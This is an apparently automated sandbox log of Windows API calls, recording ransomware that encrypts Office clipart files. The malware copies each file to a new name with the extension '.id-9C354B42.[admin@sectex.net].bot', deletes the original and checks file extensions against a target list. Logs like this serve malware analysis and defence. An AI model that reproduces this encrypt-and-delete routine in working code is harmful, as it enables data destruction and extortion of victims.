	[0144.285] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf")) returned 0x20
	[0144.285] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.285] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0144.285] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.285] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.285] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0144.286] GetLastError () returned 0x0
	[0144.286] ReadFile (in: hFile=0x3cc, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xe30, lpOverlapped=0x0) returned 1
	[0144.287] WriteFile (in: hFile=0x388, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xe40, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xe40, lpOverlapped=0x0) returned 1
	[0144.288] ReadFile (in: hFile=0x3cc, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.288] WriteFile (in: hFile=0x388, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.288] SetEndOfFile (hFile=0x388) returned 1
	[0144.288] CloseHandle (hObject=0x388) returned 1
	[0144.288] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.288] SetEndOfFile (hFile=0x3cc) returned 1
	[0144.290] CloseHandle (hObject=0x3cc) returned 1
	[0144.291] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.291] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf")) returned 1
	[0144.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63
	[0144.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63
	[0144.291] lstrlenW (lpString=".doc") returned 4
	[0144.291] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.291] lstrlenW (lpString=".docx") returned 5
	[0144.330] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.330] lstrlenW (lpString=".pdf") returned 4
	[0144.330] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.330] lstrlenW (lpString=".xls") returned 4
	[0144.330] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.330] lstrlenW (lpString=".xlsx") returned 5
	[0144.330] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.330] lstrlenW (lpString=".ppt") returned 4
	[0144.330] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63
	[0144.330] lstrlenW (lpString=".zip") returned 4
	[0144.330] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.330] lstrlenW (lpString=".rar") returned 4
	[0144.330] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.330] lstrlenW (lpString=".bz2") returned 4
	[0144.330] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.330] lstrlenW (lpString=".7z") returned 3
	[0144.330] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63
	[0144.330] lstrlenW (lpString=".dbf") returned 4
	[0144.330] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63
	[0144.330] lstrlenW (lpString=".1cd") returned 4
	[0144.330] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63
	[0144.330] lstrlenW (lpString=".jpg") returned 4
	[0144.330] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63
	[0144.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63
	[0144.330] lstrlenW (lpString=".doc") returned 4
	[0144.331] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.331] lstrlenW (lpString=".docx") returned 5
	[0144.331] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.331] lstrlenW (lpString=".pdf") returned 4
	[0144.331] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.331] lstrlenW (lpString=".xls") returned 4
	[0144.331] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.331] lstrlenW (lpString=".xlsx") returned 5
	[0144.331] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.331] lstrlenW (lpString=".ppt") returned 4
	[0144.331] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.331] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63
	[0144.331] lstrlenW (lpString=".zip") returned 4
	[0144.331] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.331] lstrlenW (lpString=".rar") returned 4
	[0144.331] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.331] lstrlenW (lpString=".bz2") returned 4
	[0144.331] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.331] lstrlenW (lpString=".7z") returned 3
	[0144.331] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.331] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63
	[0144.331] lstrlenW (lpString=".dbf") returned 4
	[0144.331] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.331] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63
	[0144.331] lstrlenW (lpString=".1cd") returned 4
	[0144.331] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.331] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63
	[0144.331] lstrlenW (lpString=".jpg") returned 4
	[0144.331] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.331] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.331] lstrlenW (lpString="DD01140_.WMF") returned 12
	[0144.332] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0144.387] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=3616) returned 1
	[0144.387] CloseHandle (hObject=0x38c) returned 1
	[0144.387] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf")) returned 0x20
	[0144.490] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.490] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0144.490] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.491] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.491] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0144.491] GetLastError () returned 0x0
	[0144.491] ReadFile (in: hFile=0x31c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xe20, lpOverlapped=0x0) returned 1
	[0144.519] WriteFile (in: hFile=0x2a0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xe30, lpOverlapped=0x0) returned 1
	[0144.520] ReadFile (in: hFile=0x31c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.520] WriteFile (in: hFile=0x2a0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.520] SetEndOfFile (hFile=0x2a0) returned 1
	[0144.521] CloseHandle (hObject=0x2a0) returned 1
	[0144.521] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.521] SetEndOfFile (hFile=0x31c) returned 1
	[0144.539] CloseHandle (hObject=0x31c) returned 1
	[0144.540] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.612] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf")) returned 1
	[0144.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63
	[0144.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63
	[0144.613] lstrlenW (lpString=".doc") returned 4
	[0144.613] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.613] lstrlenW (lpString=".docx") returned 5
	[0144.613] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.613] lstrlenW (lpString=".pdf") returned 4
	[0144.613] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.613] lstrlenW (lpString=".xls") returned 4
	[0144.613] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.613] lstrlenW (lpString=".xlsx") returned 5
	[0144.613] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.613] lstrlenW (lpString=".ppt") returned 4
	[0144.613] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63
	[0144.613] lstrlenW (lpString=".zip") returned 4
	[0144.613] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.613] lstrlenW (lpString=".rar") returned 4
	[0144.613] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.613] lstrlenW (lpString=".bz2") returned 4
	[0144.613] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.613] lstrlenW (lpString=".7z") returned 3
	[0144.613] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63
	[0144.613] lstrlenW (lpString=".dbf") returned 4
	[0144.613] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63
	[0144.613] lstrlenW (lpString=".1cd") returned 4
	[0144.613] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63
	[0144.613] lstrlenW (lpString=".jpg") returned 4
	[0144.613] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63
	[0144.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63
	[0144.614] lstrlenW (lpString=".doc") returned 4
	[0144.614] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.614] lstrlenW (lpString=".docx") returned 5
	[0144.614] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.614] lstrlenW (lpString=".pdf") returned 4
	[0144.614] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.614] lstrlenW (lpString=".xls") returned 4
	[0144.614] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.614] lstrlenW (lpString=".xlsx") returned 5
	[0144.614] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.614] lstrlenW (lpString=".ppt") returned 4
	[0144.614] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63
	[0144.614] lstrlenW (lpString=".zip") returned 4
	[0144.614] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.614] lstrlenW (lpString=".rar") returned 4
	[0144.614] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.614] lstrlenW (lpString=".bz2") returned 4
	[0144.614] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.614] lstrlenW (lpString=".7z") returned 3
	[0144.614] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63
	[0144.614] lstrlenW (lpString=".dbf") returned 4
	[0144.614] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63
	[0144.614] lstrlenW (lpString=".1cd") returned 4
	[0144.614] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63
	[0144.614] lstrlenW (lpString=".jpg") returned 4
	[0144.614] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.615] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.615] lstrlenW (lpString="DD01168_.WMF") returned 12
	[0144.615] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0144.615] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=2004) returned 1
	[0144.615] CloseHandle (hObject=0x3cc) returned 1
	[0144.615] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf")) returned 0x20
	[0144.615] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.615] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0144.616] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.616] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0144.616] GetLastError () returned 0x0
	[0144.616] ReadFile (in: hFile=0x3cc, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x7d4, lpOverlapped=0x0) returned 1
	[0144.627] WriteFile (in: hFile=0x388, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x7e0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x7e0, lpOverlapped=0x0) returned 1
	[0144.628] ReadFile (in: hFile=0x3cc, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.628] WriteFile (in: hFile=0x388, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.628] SetEndOfFile (hFile=0x388) returned 1
	[0144.628] CloseHandle (hObject=0x388) returned 1
	[0144.628] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.628] SetEndOfFile (hFile=0x3cc) returned 1
	[0144.630] CloseHandle (hObject=0x3cc) returned 1
	[0144.630] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.631] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf")) returned 1
	[0144.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63
	[0144.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63
	[0144.631] lstrlenW (lpString=".doc") returned 4
	[0144.631] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.631] lstrlenW (lpString=".docx") returned 5
	[0144.631] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.631] lstrlenW (lpString=".pdf") returned 4
	[0144.631] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.631] lstrlenW (lpString=".xls") returned 4
	[0144.631] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.631] lstrlenW (lpString=".xlsx") returned 5
	[0144.631] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.632] lstrlenW (lpString=".ppt") returned 4
	[0144.632] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63
	[0144.632] lstrlenW (lpString=".zip") returned 4
	[0144.632] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.632] lstrlenW (lpString=".rar") returned 4
	[0144.632] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.632] lstrlenW (lpString=".bz2") returned 4
	[0144.632] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.632] lstrlenW (lpString=".7z") returned 3
	[0144.632] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63
	[0144.632] lstrlenW (lpString=".dbf") returned 4
	[0144.632] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63
	[0144.632] lstrlenW (lpString=".1cd") returned 4
	[0144.632] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63
	[0144.632] lstrlenW (lpString=".jpg") returned 4
	[0144.632] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63
	[0144.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63
	[0144.632] lstrlenW (lpString=".doc") returned 4
	[0144.632] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.632] lstrlenW (lpString=".docx") returned 5
	[0144.632] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.632] lstrlenW (lpString=".pdf") returned 4
	[0144.632] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.632] lstrlenW (lpString=".xls") returned 4
	[0144.632] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.632] lstrlenW (lpString=".xlsx") returned 5
	[0144.632] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.632] lstrlenW (lpString=".ppt") returned 4
	[0144.633] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63
	[0144.633] lstrlenW (lpString=".zip") returned 4
	[0144.633] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.633] lstrlenW (lpString=".rar") returned 4
	[0144.633] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.633] lstrlenW (lpString=".bz2") returned 4
	[0144.633] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.633] lstrlenW (lpString=".7z") returned 3
	[0144.633] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63
	[0144.633] lstrlenW (lpString=".dbf") returned 4
	[0144.633] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63
	[0144.633] lstrlenW (lpString=".1cd") returned 4
	[0144.633] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63
	[0144.633] lstrlenW (lpString=".jpg") returned 4
	[0144.633] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.633] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.633] lstrlenW (lpString="DD01170_.WMF") returned 12
	[0144.633] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0144.707] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=2404) returned 1
	[0144.707] CloseHandle (hObject=0x31c) returned 1
	[0144.707] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf")) returned 0x20
